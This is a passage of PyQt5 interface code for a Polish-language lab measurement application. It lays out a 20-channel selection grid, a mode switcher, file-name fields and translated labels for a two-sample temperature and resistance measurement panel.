self.gridLayout_3 = QtWidgets.QGridLayout(self.frame_14)\n self.gridLayout_3.setObjectName(\"gridLayout_3\")\n self.label_14 = QtWidgets.QLabel(self.frame_14)\n self.label_14.setLineWidth(3)\n self.label_14.setObjectName(\"label_14\")\n self.gridLayout_3.addWidget(self.label_14, 0, 0, 1, 1)\n self.checkBox_14 = QtWidgets.QCheckBox(self.frame_14)\n self.checkBox_14.setText(\"\")\n self.checkBox_14.setObjectName(\"checkBox_14\")\n self.gridLayout_3.addWidget(self.checkBox_14, 0, 1, 1, 1)\n self.comboBox_14 = QtWidgets.QComboBox(self.frame_14)\n self.comboBox_14.setObjectName(\"comboBox_14\")\n self.comboBox_14.addItem(\"\")\n self.comboBox_14.addItem(\"\")\n self.gridLayout_3.addWidget(self.comboBox_14, 0, 2, 1, 1)\n self.gridLayout_41.addWidget(self.frame_14, 3, 1, 1, 1)\n self.frame_5 = QtWidgets.QFrame(self.frame)\n self.frame_5.setFrameShape(QtWidgets.QFrame.Box)\n self.frame_5.setFrameShadow(QtWidgets.QFrame.Plain)\n self.frame_5.setLineWidth(1)\n self.frame_5.setMidLineWidth(0)\n self.frame_5.setObjectName(\"frame_5\")\n self.gridLayout_19 = QtWidgets.QGridLayout(self.frame_5)\n self.gridLayout_19.setObjectName(\"gridLayout_19\")\n self.comboBox_5 = QtWidgets.QComboBox(self.frame_5)\n self.comboBox_5.setObjectName(\"comboBox_5\")\n self.comboBox_5.addItem(\"\")\n self.comboBox_5.addItem(\"\")\n self.gridLayout_19.addWidget(self.comboBox_5, 0, 2, 1, 1)\n self.checkBox_5 = QtWidgets.QCheckBox(self.frame_5)\n self.checkBox_5.setText(\"\")\n self.checkBox_5.setObjectName(\"checkBox_5\")\n self.gridLayout_19.addWidget(self.checkBox_5, 0, 1, 1, 1)\n self.label_5 = QtWidgets.QLabel(self.frame_5)\n self.label_5.setLineWidth(3)\n self.label_5.setObjectName(\"label_5\")\n self.gridLayout_19.addWidget(self.label_5, 0, 0, 1, 1)\n self.gridLayout_41.addWidget(self.frame_5, 4, 0, 1, 1)\n self.frame_15 = QtWidgets.QFrame(self.frame)\n self.frame_15.setFrameShape(QtWidgets.QFrame.Box)\n self.frame_15.setFrameShadow(QtWidgets.QFrame.Plain)\n self.frame_15.setLineWidth(1)\n self.frame_15.setMidLineWidth(0)\n self.frame_15.setObjectName(\"frame_15\")\n self.gridLayout_10 = QtWidgets.QGridLayout(self.frame_15)\n self.gridLayout_10.setObjectName(\"gridLayout_10\")\n self.comboBox_15 = QtWidgets.QComboBox(self.frame_15)\n 
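        # The channel rows frame_1 ... frame_18 in this grid differ only in their
        # index; a hypothetical factory like this sketch would build one complete
        # row (frame with label, checkbox and measurement-type combo):
        def _make_channel_row(parent):
            frame = QtWidgets.QFrame(parent)
            frame.setFrameShape(QtWidgets.QFrame.Box)
            frame.setFrameShadow(QtWidgets.QFrame.Plain)
            layout = QtWidgets.QGridLayout(frame)
            label = QtWidgets.QLabel(frame)
            check = QtWidgets.QCheckBox(frame)
            combo = QtWidgets.QComboBox(frame)
            combo.addItems(["", ""])  # two placeholder measurement types
            for widget, column in ((label, 0), (check, 1), (combo, 2)):
                layout.addWidget(widget, 0, column, 1, 1)
            return frame, label, check, combo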
self.comboBox_15.setObjectName(\"comboBox_15\")\n self.comboBox_15.addItem(\"\")\n self.comboBox_15.addItem(\"\")\n self.gridLayout_10.addWidget(self.comboBox_15, 0, 2, 1, 1)\n self.checkBox_15 = QtWidgets.QCheckBox(self.frame_15)\n self.checkBox_15.setText(\"\")\n self.checkBox_15.setObjectName(\"checkBox_15\")\n self.gridLayout_10.addWidget(self.checkBox_15, 0, 1, 1, 1)\n self.label_15 = QtWidgets.QLabel(self.frame_15)\n self.label_15.setLineWidth(3)\n self.label_15.setObjectName(\"label_15\")\n self.gridLayout_10.addWidget(self.label_15, 0, 0, 1, 1)\n self.gridLayout_41.addWidget(self.frame_15, 4, 1, 1, 1)\n self.frame_6 = QtWidgets.QFrame(self.frame)\n self.frame_6.setFrameShape(QtWidgets.QFrame.Box)\n self.frame_6.setFrameShadow(QtWidgets.QFrame.Plain)\n self.frame_6.setLineWidth(1)\n self.frame_6.setMidLineWidth(0)\n self.frame_6.setObjectName(\"frame_6\")\n self.gridLayout_15 = QtWidgets.QGridLayout(self.frame_6)\n self.gridLayout_15.setObjectName(\"gridLayout_15\")\n self.comboBox_6 = QtWidgets.QComboBox(self.frame_6)\n self.comboBox_6.setObjectName(\"comboBox_6\")\n self.comboBox_6.addItem(\"\")\n self.comboBox_6.addItem(\"\")\n self.gridLayout_15.addWidget(self.comboBox_6, 0, 2, 1, 1)\n self.checkBox_6 = QtWidgets.QCheckBox(self.frame_6)\n self.checkBox_6.setText(\"\")\n self.checkBox_6.setObjectName(\"checkBox_6\")\n self.gridLayout_15.addWidget(self.checkBox_6, 0, 1, 1, 1)\n self.label_6 = QtWidgets.QLabel(self.frame_6)\n self.label_6.setLineWidth(3)\n self.label_6.setObjectName(\"label_6\")\n self.gridLayout_15.addWidget(self.label_6, 0, 0, 1, 1)\n self.gridLayout_41.addWidget(self.frame_6, 5, 0, 1, 1)\n self.frame_16 = QtWidgets.QFrame(self.frame)\n self.frame_16.setFrameShape(QtWidgets.QFrame.Box)\n self.frame_16.setFrameShadow(QtWidgets.QFrame.Plain)\n self.frame_16.setLineWidth(1)\n self.frame_16.setMidLineWidth(0)\n self.frame_16.setObjectName(\"frame_16\")\n self.gridLayout_8 = QtWidgets.QGridLayout(self.frame_16)\n self.gridLayout_8.setObjectName(\"gridLayout_8\")\n self.label_16 = QtWidgets.QLabel(self.frame_16)\n self.label_16.setLineWidth(3)\n self.label_16.setObjectName(\"label_16\")\n self.gridLayout_8.addWidget(self.label_16, 0, 0, 1, 1)\n self.checkBox_16 = QtWidgets.QCheckBox(self.frame_16)\n self.checkBox_16.setText(\"\")\n self.checkBox_16.setObjectName(\"checkBox_16\")\n self.gridLayout_8.addWidget(self.checkBox_16, 0, 1, 1, 1)\n self.comboBox_16 = QtWidgets.QComboBox(self.frame_16)\n self.comboBox_16.setObjectName(\"comboBox_16\")\n self.comboBox_16.addItem(\"\")\n self.comboBox_16.addItem(\"\")\n self.gridLayout_8.addWidget(self.comboBox_16, 0, 2, 1, 1)\n self.gridLayout_41.addWidget(self.frame_16, 5, 1, 1, 1)\n self.frame_7 = QtWidgets.QFrame(self.frame)\n self.frame_7.setFrameShape(QtWidgets.QFrame.Box)\n self.frame_7.setFrameShadow(QtWidgets.QFrame.Plain)\n self.frame_7.setLineWidth(1)\n self.frame_7.setMidLineWidth(0)\n self.frame_7.setObjectName(\"frame_7\")\n self.gridLayout_18 = QtWidgets.QGridLayout(self.frame_7)\n self.gridLayout_18.setObjectName(\"gridLayout_18\")\n self.comboBox_7 = QtWidgets.QComboBox(self.frame_7)\n self.comboBox_7.setObjectName(\"comboBox_7\")\n self.comboBox_7.addItem(\"\")\n self.comboBox_7.addItem(\"\")\n self.gridLayout_18.addWidget(self.comboBox_7, 0, 2, 1, 1)\n self.checkBox_7 = QtWidgets.QCheckBox(self.frame_7)\n self.checkBox_7.setText(\"\")\n self.checkBox_7.setObjectName(\"checkBox_7\")\n self.gridLayout_18.addWidget(self.checkBox_7, 0, 1, 1, 1)\n self.label_7 = QtWidgets.QLabel(self.frame_7)\n 
self.label_7.setLineWidth(3)\n self.label_7.setObjectName(\"label_7\")\n self.gridLayout_18.addWidget(self.label_7, 0, 0, 1, 1)\n self.gridLayout_41.addWidget(self.frame_7, 6, 0, 1, 1)\n self.frame_17 = QtWidgets.QFrame(self.frame)\n self.frame_17.setFrameShape(QtWidgets.QFrame.Box)\n self.frame_17.setFrameShadow(QtWidgets.QFrame.Plain)\n self.frame_17.setLineWidth(1)\n self.frame_17.setMidLineWidth(0)\n self.frame_17.setObjectName(\"frame_17\")\n self.gridLayout_11 = QtWidgets.QGridLayout(self.frame_17)\n self.gridLayout_11.setObjectName(\"gridLayout_11\")\n self.label_17 = QtWidgets.QLabel(self.frame_17)\n self.label_17.setLineWidth(3)\n self.label_17.setObjectName(\"label_17\")\n self.gridLayout_11.addWidget(self.label_17, 0, 0, 1, 1)\n self.checkBox_17 = QtWidgets.QCheckBox(self.frame_17)\n self.checkBox_17.setText(\"\")\n self.checkBox_17.setObjectName(\"checkBox_17\")\n self.gridLayout_11.addWidget(self.checkBox_17, 0, 1, 1, 1)\n self.comboBox_17 = QtWidgets.QComboBox(self.frame_17)\n self.comboBox_17.setObjectName(\"comboBox_17\")\n self.comboBox_17.addItem(\"\")\n self.comboBox_17.addItem(\"\")\n self.gridLayout_11.addWidget(self.comboBox_17, 0, 2, 1, 1)\n self.gridLayout_41.addWidget(self.frame_17, 6, 1, 1, 1)\n self.frame_8 = QtWidgets.QFrame(self.frame)\n self.frame_8.setFrameShape(QtWidgets.QFrame.Box)\n self.frame_8.setFrameShadow(QtWidgets.QFrame.Plain)\n self.frame_8.setLineWidth(1)\n self.frame_8.setMidLineWidth(0)\n self.frame_8.setObjectName(\"frame_8\")\n self.gridLayout_17 = QtWidgets.QGridLayout(self.frame_8)\n self.gridLayout_17.setObjectName(\"gridLayout_17\")\n self.comboBox_8 = QtWidgets.QComboBox(self.frame_8)\n self.comboBox_8.setObjectName(\"comboBox_8\")\n self.comboBox_8.addItem(\"\")\n self.comboBox_8.addItem(\"\")\n self.gridLayout_17.addWidget(self.comboBox_8, 0, 2, 1, 1)\n self.checkBox_8 = QtWidgets.QCheckBox(self.frame_8)\n self.checkBox_8.setText(\"\")\n self.checkBox_8.setObjectName(\"checkBox_8\")\n self.gridLayout_17.addWidget(self.checkBox_8, 0, 1, 1, 1)\n self.label_8 = QtWidgets.QLabel(self.frame_8)\n self.label_8.setLineWidth(3)\n self.label_8.setObjectName(\"label_8\")\n self.gridLayout_17.addWidget(self.label_8, 0, 0, 1, 1)\n self.gridLayout_41.addWidget(self.frame_8, 7, 0, 1, 1)\n self.frame_18 = QtWidgets.QFrame(self.frame)\n self.frame_18.setFrameShape(QtWidgets.QFrame.Box)\n self.frame_18.setFrameShadow(QtWidgets.QFrame.Plain)\n self.frame_18.setLineWidth(1)\n self.frame_18.setMidLineWidth(0)\n self.frame_18.setObjectName(\"frame_18\")\n self.gridLayout_5 = QtWidgets.QGridLayout(self.frame_18)\n self.gridLayout_5.setObjectName(\"gridLayout_5\")\n self.label_18 = QtWidgets.QLabel(self.frame_18)\n self.label_18.setLineWidth(3)\n self.label_18.setObjectName(\"label_18\")\n self.gridLayout_5.addWidget(self.label_18, 0, 0, 1, 1)\n self.checkBox_18 = QtWidgets.QCheckBox(self.frame_18)\n self.checkBox_18.setText(\"\")\n self.checkBox_18.setObjectName(\"checkBox_18\")\n self.gridLayout_5.addWidget(self.checkBox_18, 0, 1, 1, 1)\n self.comboBox_18 = QtWidgets.QComboBox(self.frame_18)\n self.comboBox_18.setObjectName(\"comboBox_18\")\n self.comboBox_18.addItem(\"\")\n self.comboBox_18.addItem(\"\")\n self.gridLayout_5.addWidget(self.comboBox_18, 0, 2, 1, 1)\n self.gridLayout_41.addWidget(self.frame_18, 7, 1, 1, 1)\n self.frame_9 = QtWidgets.QFrame(self.frame)\n self.frame_9.setFrameShape(QtWidgets.QFrame.Box)\n self.frame_9.setFrameShadow(QtWidgets.QFrame.Plain)\n self.frame_9.setLineWidth(1)\n self.frame_9.setMidLineWidth(0)\n 
self.frame_9.setObjectName(\"frame_9\")\n self.gridLayout_16 = QtWidgets.QGridLayout(self.frame_9)\n self.gridLayout_16.setObjectName(\"gridLayout_16\")\n self.comboBox_9 = QtWidgets.QComboBox(self.frame_9)\n self.comboBox_9.setObjectName(\"comboBox_9\")\n self.comboBox_9.addItem(\"\")\n self.comboBox_9.addItem(\"\")\n self.gridLayout_16.addWidget(self.comboBox_9, 0, 2, 1, 1)\n self.checkBox_9 = QtWidgets.QCheckBox(self.frame_9)\n self.checkBox_9.setText(\"\")\n self.checkBox_9.setObjectName(\"checkBox_9\")\n self.gridLayout_16.addWidget(self.checkBox_9, 0, 1, 1, 1)\n self.label_9 = QtWidgets.QLabel(self.frame_9)\n self.label_9.setLineWidth(3)\n self.label_9.setObjectName(\"label_9\")\n self.gridLayout_16.addWidget(self.label_9, 0, 0, 1, 1)\n self.gridLayout_41.addWidget(self.frame_9, 8, 0, 1, 1)\n self.frame_19 = QtWidgets.QFrame(self.frame)\n self.frame_19.setFrameShape(QtWidgets.QFrame.Box)\n self.frame_19.setFrameShadow(QtWidgets.QFrame.Plain)\n self.frame_19.setLineWidth(1)\n self.frame_19.setMidLineWidth(0)\n self.frame_19.setObjectName(\"frame_19\")\n self.gridLayout_12 = QtWidgets.QGridLayout(self.frame_19)\n self.gridLayout_12.setObjectName(\"gridLayout_12\")\n self.checkBox_19 = QtWidgets.QCheckBox(self.frame_19)\n self.checkBox_19.setText(\"\")\n self.checkBox_19.setObjectName(\"checkBox_19\")\n self.gridLayout_12.addWidget(self.checkBox_19, 0, 1, 1, 1)\n self.comboBox_19 = QtWidgets.QComboBox(self.frame_19)\n self.comboBox_19.setObjectName(\"comboBox_19\")\n self.comboBox_19.addItem(\"\")\n self.comboBox_19.addItem(\"\")\n self.gridLayout_12.addWidget(self.comboBox_19, 0, 2, 1, 1)\n self.label_19 = QtWidgets.QLabel(self.frame_19)\n self.label_19.setLineWidth(3)\n self.label_19.setObjectName(\"label_19\")\n self.gridLayout_12.addWidget(self.label_19, 0, 0, 1, 1)\n self.gridLayout_41.addWidget(self.frame_19, 8, 1, 1, 1)\n self.frame_10 = QtWidgets.QFrame(self.frame)\n self.frame_10.setFrameShape(QtWidgets.QFrame.Box)\n self.frame_10.setFrameShadow(QtWidgets.QFrame.Plain)\n self.frame_10.setLineWidth(1)\n self.frame_10.setMidLineWidth(0)\n self.frame_10.setObjectName(\"frame_10\")\n self.gridLayout_13 = QtWidgets.QGridLayout(self.frame_10)\n self.gridLayout_13.setObjectName(\"gridLayout_13\")\n self.comboBox_10 = QtWidgets.QComboBox(self.frame_10)\n self.comboBox_10.setObjectName(\"comboBox_10\")\n self.comboBox_10.addItem(\"\")\n self.comboBox_10.addItem(\"\")\n self.gridLayout_13.addWidget(self.comboBox_10, 0, 2, 1, 1)\n self.checkBox_10 = QtWidgets.QCheckBox(self.frame_10)\n self.checkBox_10.setText(\"\")\n self.checkBox_10.setObjectName(\"checkBox_10\")\n self.gridLayout_13.addWidget(self.checkBox_10, 0, 1, 1, 1)\n self.label_10 = QtWidgets.QLabel(self.frame_10)\n self.label_10.setLineWidth(3)\n self.label_10.setObjectName(\"label_10\")\n self.gridLayout_13.addWidget(self.label_10, 0, 0, 1, 1)\n self.gridLayout_41.addWidget(self.frame_10, 9, 0, 1, 1)\n self.frame_20 = QtWidgets.QFrame(self.frame)\n self.frame_20.setFrameShape(QtWidgets.QFrame.Box)\n self.frame_20.setFrameShadow(QtWidgets.QFrame.Plain)\n self.frame_20.setLineWidth(1)\n self.frame_20.setMidLineWidth(0)\n self.frame_20.setObjectName(\"frame_20\")\n self.gridLayout_9 = QtWidgets.QGridLayout(self.frame_20)\n self.gridLayout_9.setObjectName(\"gridLayout_9\")\n self.label_20 = QtWidgets.QLabel(self.frame_20)\n self.label_20.setLineWidth(3)\n self.label_20.setObjectName(\"label_20\")\n self.gridLayout_9.addWidget(self.label_20, 0, 0, 1, 1)\n self.checkBox_20 = QtWidgets.QCheckBox(self.frame_20)\n 
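The twenty channel cells above (frame + label + checkbox + combobox per channel) are emitted verbatim by pyuic, which never generates loops. For a hand-maintained version of the same dialog the grid can be built programmatically; a minimal sketch, assuming PyQt5 and the two-column layout used here (the helper name and the returned `widgets` mapping are hypothetical, not part of the generated file):

```python
from PyQt5 import QtWidgets

def build_channel_grid(parent, grid, n_channels=20, columns=2):
    """Build n_channels identical cells (label + checkbox + combobox) in a grid."""
    per_column = n_channels // columns
    widgets = {}
    for i in range(1, n_channels + 1):
        frame = QtWidgets.QFrame(parent)
        frame.setFrameShape(QtWidgets.QFrame.Box)
        frame.setFrameShadow(QtWidgets.QFrame.Plain)
        cell = QtWidgets.QGridLayout(frame)
        label = QtWidgets.QLabel("Kanał %d" % i, frame)
        check = QtWidgets.QCheckBox(frame)
        combo = QtWidgets.QComboBox(frame)
        combo.addItems(["Napięcie [v]", "Opór [Ohm]"])
        cell.addWidget(label, 0, 0)
        cell.addWidget(check, 0, 1)
        cell.addWidget(combo, 0, 2)
        # channels 1..10 fill the left column top-down, 11..20 the right one
        grid.addWidget(frame, (i - 1) % per_column, (i - 1) // per_column)
        widgets[i] = (check, combo)
    return widgets
```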
self.checkBox_20.setText(\"\")\n self.checkBox_20.setObjectName(\"checkBox_20\")\n self.gridLayout_9.addWidget(self.checkBox_20, 0, 1, 1, 1)\n self.comboBox_20 = QtWidgets.QComboBox(self.frame_20)\n self.comboBox_20.setObjectName(\"comboBox_20\")\n self.comboBox_20.addItem(\"\")\n self.comboBox_20.addItem(\"\")\n self.gridLayout_9.addWidget(self.comboBox_20, 0, 2, 1, 1)\n self.gridLayout_41.addWidget(self.frame_20, 9, 1, 1, 1)\n #---------\n\n#-------------->\n self.stackedWidget.addWidget(self.Tryb_CH20)\n\n#<----zmiana trybu\n\n self.zmiana_trybu = QtWidgets.QComboBox(self.centralwidget)\n self.zmiana_trybu.setGeometry(QtCore.QRect(910, 10, 243, 25))\n font = QtGui.QFont()\n font.setPointSize(9)\n self.zmiana_trybu.setFont(font)\n self.zmiana_trybu.setObjectName(\"zmiana_trybu\")\n self.zmiana_trybu.addItem(\"\")\n self.zmiana_trybu.addItem(\"\")\n self.zmiana_trybu.addItem(\"\")\n\n self.zmiana_trybu_tekst = QtWidgets.QLabel(self.centralwidget)\n self.zmiana_trybu_tekst.setGeometry(QtCore.QRect(870, 10, 35, 25))\n font = QtGui.QFont()\n font.setPointSize(9)\n self.zmiana_trybu_tekst.setFont(font)\n self.zmiana_trybu_tekst.setObjectName(\"zmiana_trybu_tekst\")\n#------>\n\n#<-----nazwa pliku\n self.naglowek = QtWidgets.QLabel(self.centralwidget)\n self.naglowek.setGeometry(QtCore.QRect(540, 10, 250, 31))\n font = QtGui.QFont()\n font.setPointSize(15)\n self.naglowek.setFont(font)\n self.naglowek.setObjectName(\"naglowek\")\n\n self.nazwa_pliku = QtWidgets.QLineEdit(self.centralwidget)\n self.nazwa_pliku.setGeometry(QtCore.QRect(310, 10, 122, 26))\n self.nazwa_pliku.setObjectName(\"nazwa_pliku\")\n\n self.nazwa_pliku_tekst = QtWidgets.QLabel(self.centralwidget)\n self.nazwa_pliku_tekst.setGeometry(QtCore.QRect(40, 10, 221, 26))\n font = QtGui.QFont()\n font.setPointSize(9)\n self.nazwa_pliku_tekst.setFont(font)\n self.nazwa_pliku_tekst.setObjectName(\"nazwa_pliku_tekst\")\n\n self.nazwa_pliku_przedrostek = QtWidgets.QLabel(self.centralwidget)\n self.nazwa_pliku_przedrostek.setGeometry(QtCore.QRect(213, 10, 90, 26))\n self.nazwa_pliku_przedrostek.setMinimumSize(QtCore.QSize(60, 0))\n font = QtGui.QFont()\n font.setPointSize(9)\n self.nazwa_pliku_przedrostek.setFont(font)\n self.nazwa_pliku_przedrostek.setStyleSheet(\"background-color: rgb(255, 255, 255);\")\n self.nazwa_pliku_przedrostek.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)\n self.nazwa_pliku_przedrostek.setObjectName(\"nazwa_pliku_przedrostek\")\n#---------->\n\n#<---pasek menu---\n MainWindow.setCentralWidget(self.centralwidget)\n self.menu = QtWidgets.QMenuBar(MainWindow)\n self.menu.setGeometry(QtCore.QRect(0, 0, 1200, 26))\n self.menu.setObjectName(\"menu\")\n self.Ustawienia = QtWidgets.QAction(self.menu)\n self.Ustawienia.setObjectName(\"Ustawienia\")\n self.Pomoc = QtWidgets.QAction(self.menu)\n self.Pomoc.setObjectName(\"Pomoc\")\n MainWindow.setMenuBar(self.menu)\n self.statusbar = QtWidgets.QStatusBar(MainWindow)\n self.statusbar.setObjectName(\"statusbar\")\n MainWindow.setStatusBar(self.statusbar)\n self.menu.addAction(self.Ustawienia)\n self.menu.addAction(self.Pomoc)\n#------->\n\n self.retranslateUi(MainWindow)\n self.stackedWidget.setCurrentIndex(0)\n QtCore.QMetaObject.connectSlotsByName(MainWindow)\n\n def retranslateUi(self, MainWindow):\n _translate = QtCore.QCoreApplication.translate\n MainWindow.setWindowTitle(_translate(\"MainWindow\", \"MainWindow\"))\n \n #<---pomiar 2 próbek--\n self.P2_skala_log_t.setText(_translate(\"MainWindow\", \"Skala log\"))\n 
self.P2_skala_log_p1.setText(_translate(\"MainWindow\", \"Skala log\"))\n self.P2_skala_log_p2.setText(_translate(\"MainWindow\", \"Skala log\"))\n \n self.P2_wybor_kanalow_p1.setCurrentText(_translate(\"MainWindow\", \"2\"))\n self.P2_wybor_kanalow_p1.setItemText(0, _translate(\"MainWindow\", \"1\"))\n self.P2_wybor_kanalow_p1.setItemText(1, _translate(\"MainWindow\", \"2\"))\n self.P2_wybor_kanalow_p1.setItemText(2, _translate(\"MainWindow\", \"3\"))\n self.P2_wybor_kanalow_p1.setItemText(3, _translate(\"MainWindow\", \"4\"))\n self.P2_wybor_kanalow_p1.setItemText(4, _translate(\"MainWindow\", \"5\"))\n self.P2_wybor_kanalow_p1.setItemText(5, _translate(\"MainWindow\", \"6\"))\n self.P2_wybor_kanalow_p1.setItemText(6, _translate(\"MainWindow\", \"7\"))\n self.P2_wybor_kanalow_p1.setItemText(7, _translate(\"MainWindow\", \"8\"))\n self.P2_wybor_kanalow_p1.setItemText(8, _translate(\"MainWindow\", \"9\"))\n self.P2_wybor_kanalow_p1.setItemText(9, _translate(\"MainWindow\", \"10\"))\n self.P2_wybor_kanalow_p1.setItemText(10, _translate(\"MainWindow\", \"11\"))\n self.P2_wybor_kanalow_p1.setItemText(11, _translate(\"MainWindow\", \"12\"))\n self.P2_wybor_kanalow_p1.setItemText(12, _translate(\"MainWindow\", \"13\"))\n self.P2_wybor_kanalow_p1.setItemText(13, _translate(\"MainWindow\", \"14\"))\n self.P2_wybor_kanalow_p1.setItemText(14, _translate(\"MainWindow\", \"15\"))\n self.P2_wybor_kanalow_p1.setItemText(15, _translate(\"MainWindow\", \"16\"))\n self.P2_wybor_kanalow_p1.setItemText(16, _translate(\"MainWindow\", \"17\"))\n self.P2_wybor_kanalow_p1.setItemText(17, _translate(\"MainWindow\", \"18\"))\n self.P2_wybor_kanalow_p1.setItemText(18, _translate(\"MainWindow\", \"19\"))\n self.P2_wybor_kanalow_p1.setItemText(19, _translate(\"MainWindow\", \"20\"))\n\n self.P2_wybor_kanalow_p2.setCurrentText(_translate(\"MainWindow\", \"3\"))\n self.P2_wybor_kanalow_p2.setItemText(0, _translate(\"MainWindow\", \"1\"))\n self.P2_wybor_kanalow_p2.setItemText(1, _translate(\"MainWindow\", \"2\"))\n self.P2_wybor_kanalow_p2.setItemText(2, _translate(\"MainWindow\", \"3\"))\n self.P2_wybor_kanalow_p2.setItemText(3, _translate(\"MainWindow\", \"4\"))\n self.P2_wybor_kanalow_p2.setItemText(4, _translate(\"MainWindow\", \"5\"))\n self.P2_wybor_kanalow_p2.setItemText(5, _translate(\"MainWindow\", \"6\"))\n self.P2_wybor_kanalow_p2.setItemText(6, _translate(\"MainWindow\", \"7\"))\n self.P2_wybor_kanalow_p2.setItemText(7, _translate(\"MainWindow\", \"8\"))\n self.P2_wybor_kanalow_p2.setItemText(8, _translate(\"MainWindow\", \"9\"))\n self.P2_wybor_kanalow_p2.setItemText(9, _translate(\"MainWindow\", \"10\"))\n self.P2_wybor_kanalow_p2.setItemText(10, _translate(\"MainWindow\", \"11\"))\n self.P2_wybor_kanalow_p2.setItemText(11, _translate(\"MainWindow\", \"12\"))\n self.P2_wybor_kanalow_p2.setItemText(12, _translate(\"MainWindow\", \"13\"))\n self.P2_wybor_kanalow_p2.setItemText(13, _translate(\"MainWindow\", \"14\"))\n self.P2_wybor_kanalow_p2.setItemText(14, _translate(\"MainWindow\", \"15\"))\n self.P2_wybor_kanalow_p2.setItemText(15, _translate(\"MainWindow\", \"16\"))\n self.P2_wybor_kanalow_p2.setItemText(16, _translate(\"MainWindow\", \"17\"))\n self.P2_wybor_kanalow_p2.setItemText(17, _translate(\"MainWindow\", \"18\"))\n self.P2_wybor_kanalow_p2.setItemText(18, _translate(\"MainWindow\", \"19\"))\n self.P2_wybor_kanalow_p2.setItemText(19, _translate(\"MainWindow\", \"20\"))\n\n self.P2_wybor_kanalow_t.setCurrentText(_translate(\"MainWindow\", \"1\"))\n self.P2_wybor_kanalow_t.setItemText(0, 
_translate(\"MainWindow\", \"1\"))\n self.P2_wybor_kanalow_t.setItemText(1, _translate(\"MainWindow\", \"2\"))\n self.P2_wybor_kanalow_t.setItemText(2, _translate(\"MainWindow\", \"3\"))\n self.P2_wybor_kanalow_t.setItemText(3, _translate(\"MainWindow\", \"4\"))\n self.P2_wybor_kanalow_t.setItemText(4, _translate(\"MainWindow\", \"5\"))\n self.P2_wybor_kanalow_t.setItemText(5, _translate(\"MainWindow\", \"6\"))\n self.P2_wybor_kanalow_t.setItemText(6, _translate(\"MainWindow\", \"7\"))\n self.P2_wybor_kanalow_t.setItemText(7, _translate(\"MainWindow\", \"8\"))\n self.P2_wybor_kanalow_t.setItemText(8, _translate(\"MainWindow\", \"9\"))\n self.P2_wybor_kanalow_t.setItemText(9, _translate(\"MainWindow\", \"10\"))\n self.P2_wybor_kanalow_t.setItemText(10, _translate(\"MainWindow\", \"11\"))\n self.P2_wybor_kanalow_t.setItemText(11, _translate(\"MainWindow\", \"12\"))\n self.P2_wybor_kanalow_t.setItemText(12, _translate(\"MainWindow\", \"13\"))\n self.P2_wybor_kanalow_t.setItemText(13, _translate(\"MainWindow\", \"14\"))\n self.P2_wybor_kanalow_t.setItemText(14, _translate(\"MainWindow\", \"15\"))\n self.P2_wybor_kanalow_t.setItemText(15, _translate(\"MainWindow\", \"16\"))\n self.P2_wybor_kanalow_t.setItemText(16, _translate(\"MainWindow\", \"17\"))\n self.P2_wybor_kanalow_t.setItemText(17, _translate(\"MainWindow\", \"18\"))\n self.P2_wybor_kanalow_t.setItemText(18, _translate(\"MainWindow\", \"19\"))\n self.P2_wybor_kanalow_t.setItemText(19, _translate(\"MainWindow\", \"20\"))\n\n self.P2_wybor_kanalow_tekst_p1.setText(_translate(\"MainWindow\", \"Wybór kanału:\"))\n self.P2_wybor_kanalow_tekst_p2.setText(_translate(\"MainWindow\", \"Wybór kanału:\"))\n self.P2_wybor_osix_tekst_p1.setText(_translate(\"MainWindow\", \"Dane osi X:\"))\n\n self.P2_wybor_osix_p1.setItemText(0, _translate(\"MainWindow\", \"t [s]\"))\n self.P2_wybor_osix_p1.setItemText(1, _translate(\"MainWindow\", \"T [K]\"))\n self.P2_wybor_osix_tekst_p2.setText(_translate(\"MainWindow\", \"Dane osi X:\"))\n self.P2_wybor_osix_p2.setItemText(0, _translate(\"MainWindow\", \"t [s]\"))\n self.P2_wybor_osix_p2.setItemText(1, _translate(\"MainWindow\", \"T [K]\"))\n self.P2_wybor_kanalow_tekst_t.setText(_translate(\"MainWindow\", \"Wybór kanału:\"))\n\n self.P2_czestotliowsc_tekst.setText(_translate(\"MainWindow\", \"Częstotliwość próbkowania [s]:\"))\n\n self.P2_temperatura_tekst.setText(_translate(\"MainWindow\", \"Aktualna temperatura [K]:\"))\n self.P2_temperatura.setText(_translate(\"MainWindow\", \"0\"))\n \n self.P2_tempo_tekst.setText(_translate(\"MainWindow\", \"Tempo przyrostu temperatury [K/min.]:\"))\n self.P2_tempo.setText(_translate(\"MainWindow\", \"0\"))\n self.P2_sledzenie_temp_tekst.setText(_translate(\"MainWindow\", \"Automatyczne śledzenie temperatury [K]:\"))\n \n self.P2_moc_tekst.setText(_translate(\"MainWindow\", \"Moc grzałki [%]:\"))\n self.P2_moc.setText(_translate(\"MainWindow\", \"0\"))\n \n self.P2_start.setText(_translate(\"MainWindow\", \"Start\"))\n self.P2_reset.setText(_translate(\"MainWindow\", \"Reset\"))\n self.P2_licznik.setText(_translate(\"MainWindow\", \"00:00\"))\n\n self.P2_zakres_tekst_p1.setText(_translate(\"MainWindow\", \"Zakres:\"))\n self.P2_zakres_p1.setCurrentText(_translate(\"MainWindow\", \"1 M\"))\n self.P2_zakres_p1.setItemText(0, _translate(\"MainWindow\",\"100 R\"))\n self.P2_zakres_p1.setItemText(1, _translate(\"MainWindow\",\"1 k\"))\n self.P2_zakres_p1.setItemText(2, _translate(\"MainWindow\", \"10 k\"))\n self.P2_zakres_p1.setItemText(3, _translate(\"MainWindow\", \"100 
k\"))\n self.P2_zakres_p1.setItemText(4, _translate(\"MainWindow\", \"1 M\"))\n self.P2_zakres_p1.setItemText(5, _translate(\"MainWindow\", \"10 M\"))\n self.P2_zakres_p1.setItemText(6, _translate(\"MainWindow\", \"100 M\"))\n self.P2_zakres_tekst_p2.setText(_translate(\"MainWindow\", \"Zakres:\"))\n self.P2_zakres_p2.setCurrentText(_translate(\"MainWindow\", \"100 M\"))\n self.P2_zakres_p2.setItemText(0, _translate(\"MainWindow\", \"100 R\"))\n self.P2_zakres_p2.setItemText(1, _translate(\"MainWindow\", \"1 k\"))\n self.P2_zakres_p2.setItemText(2, _translate(\"MainWindow\", \"10 k\"))\n self.P2_zakres_p2.setItemText(3, _translate(\"MainWindow\", \"100 k\"))\n self.P2_zakres_p2.setItemText(4, _translate(\"MainWindow\", \"1 M\"))\n self.P2_zakres_p2.setItemText(5, _translate(\"MainWindow\", \"10 M\"))\n self.P2_zakres_p2.setItemText(6, _translate(\"MainWindow\", \"100 M\"))\n #--------->\n\n #<------pomiar 